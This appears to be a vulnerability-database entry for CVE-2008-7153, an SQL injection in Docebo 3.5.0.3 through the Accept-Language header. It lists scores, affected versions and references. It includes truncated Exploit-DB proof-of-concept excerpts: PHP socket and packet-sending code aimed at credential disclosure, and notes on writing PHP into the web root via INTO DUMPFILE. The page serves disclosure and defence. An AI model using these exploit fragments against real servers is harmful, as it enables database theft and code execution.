CVE-2008-7153
published 2009-09-02CVE-2008-7153: SQL injection vulnerability in the autoDetectRegion function in doceboCore/lib/lib.regset.php in Docebo 3.5.0.3 and earlier allows remote attackers to execute…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.39%
81.8th percentile
SQL injection vulnerability in the autoDetectRegion function in doceboCore/lib/lib.regset.php in Docebo 3.5.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via the Accept-Language HTTP header. NOTE: this can be leveraged to execute arbitrary PHP code using the INTO DUMPFILE command.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| docebo | docebo | <= 3.5.0.3 | — |
| docebo | docebo | — | — |
| docebo | docebo | — | — |
| docebo | docebo | — | — |
| docebo | docebo | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Docebo 3.5.0.3 - '/lib.regset.php/non-blind' SQL Injection
exploitdb·2008-01-11
CVE-2008-7153 Docebo 3.5.0.3 - '/lib.regset.php/non-blind' SQL Injection
Docebo 3.5.0.3 - '/lib.regset.php/non-blind' SQL Injection
---
= 4.1
PHP 5.X (needed by Docebo) regardless of php.ini settings
no benchmark()
quickly coded to perform credentials disclosure
');
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$
Exploit-DB
Docebo 3.5.0.3 - 'lib.regset.php' Command Execution
exploitdb·2008-01-09
CVE-2008-7154 Docebo 3.5.0.3 - 'lib.regset.php' Command Execution
Docebo 3.5.0.3 - 'lib.regset.php' Command Execution
---
_getListTable()." WHERE browsercode LIKE '%".$browser_language."%'"; _executeQuery($qtxt);
801.
802. if (($q) && (mysql_num_rows($q) > 0)) {
803. $row=mysql_fetch_array($q);
804. $res=$row["region_id"];
805. }
an attacker cuold be inject SQL code through http accept-language header (in the query at line 799), but explode() function at
line 790 will split the injected code by comma (","), so isn't possible even a blind SQL injection with BENCHMARK() method...
this poc will try to inject some php code into docebo web directory by INTO DUMPFILE statement, this requires FILE privilege!
[-] Path disclosure at:
/doceboCore/class/class.conf_fw.php
/doceboCore/class.module/class.event_manager.php
/doceboCore/lib/lib.domxml5.php
/doceboCo
No writeups or analysis indexed.
http://osvdb.org/40138http://secunia.com/advisories/28378http://www.docebo.org/doceboCms/bugtracker/18_124/bugdetails/appid_24-bugid_198/bugtracker.htmlhttp://www.securityfocus.com/bid/27211https://exchange.xforce.ibmcloud.com/vulnerabilities/39589https://www.exploit-db.com/exploits/4879https://www.exploit-db.com/exploits/4891http://osvdb.org/40138http://secunia.com/advisories/28378http://www.docebo.org/doceboCms/bugtracker/18_124/bugdetails/appid_24-bugid_198/bugtracker.htmlhttp://www.securityfocus.com/bid/27211https://exchange.xforce.ibmcloud.com/vulnerabilities/39589https://www.exploit-db.com/exploits/4879https://www.exploit-db.com/exploits/4891
2009-09-02
Published